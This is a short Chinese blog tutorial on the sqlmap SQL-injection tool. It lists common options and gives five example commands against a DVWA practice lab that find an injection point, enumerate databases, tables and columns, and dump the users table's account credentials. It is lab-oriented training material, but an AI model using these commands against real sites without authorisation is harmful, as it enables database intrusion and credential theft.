Sqlmap 數據庫注入工具簡單使用

原創 林家大公子 2020-07-04 05:24

一、 官方對與工具的解釋

sqlmap是一款開源滲透測試工具,可自動檢測和利用SQL注入漏洞並接管數據庫服務器。它具有強大的檢測引擎,針對終極滲透測試人員的衆多特性,以及從數據庫指紋識別,從數據庫獲取數據,到訪問底層文件系統以及在操作系統上執行命令的各種開關,帶外連接。

二、一些常用的選項

  • –dump 轉儲DBMS數據庫表條目
  • –dump-all 轉儲所有DBMS數據庫表條目
  • –tables 枚舉DBMS數據庫表
  • –columns 枚舉DBMS數據庫表列
  • –u 指定目標的URL
  • –cookie=COOKIE HTTP Cookie標頭值
  • –level=LEVEL 要執行的測試級別(1-5,默認值1)
  • –risk=RISK 要執行測試的風險(1-3,默認值1)
  • –dbms=DBMS 強制指定數據庫類

三、 簡單的測試實例

  1. 檢測注入點 
    sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1"
  2. 列出數據庫 
    sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" --dbs
  3. 列出指定數據庫中的表 
    sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa --tables
  4. 列出指定表中的列 
    sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dwwa -T users --columns
  5. dump出指定列中的數據字段,及帳號密碼 
    sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa -T users --columns --dump
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Sqlmap update

sqlmap --update

林家大公子 2020-07-04 05:24:23

Imperva WAF 添加黑名單

林家大公子 2020-05-20 07:19:28

windows安裝Sharewaf

林家大公子 2020-05-04 20:28:55

流氓DHCP服務器內網攻擊測試

林家大公子 2020-05-04 20:28:55

勒索病毒自救在線工具

林家大公子 2020-04-29 00:37:58

免費的APP安全在線檢測平臺

林家大公子 2020-04-26 21:01:07

Sqlmap update

sqlmap --update

林家大公子 2020-07-04 05:24:23

Imperva WAF 添加黑名單

林家大公子 2020-05-20 07:19:28

windows安裝Sharewaf

林家大公子 2020-05-04 20:28:55

流氓DHCP服務器內網攻擊測試

林家大公子 2020-05-04 20:28:55

勒索病毒自救在線工具

林家大公子 2020-04-29 00:37:58

免費的APP安全在線檢測平臺

林家大公子 2020-04-26 21:01:07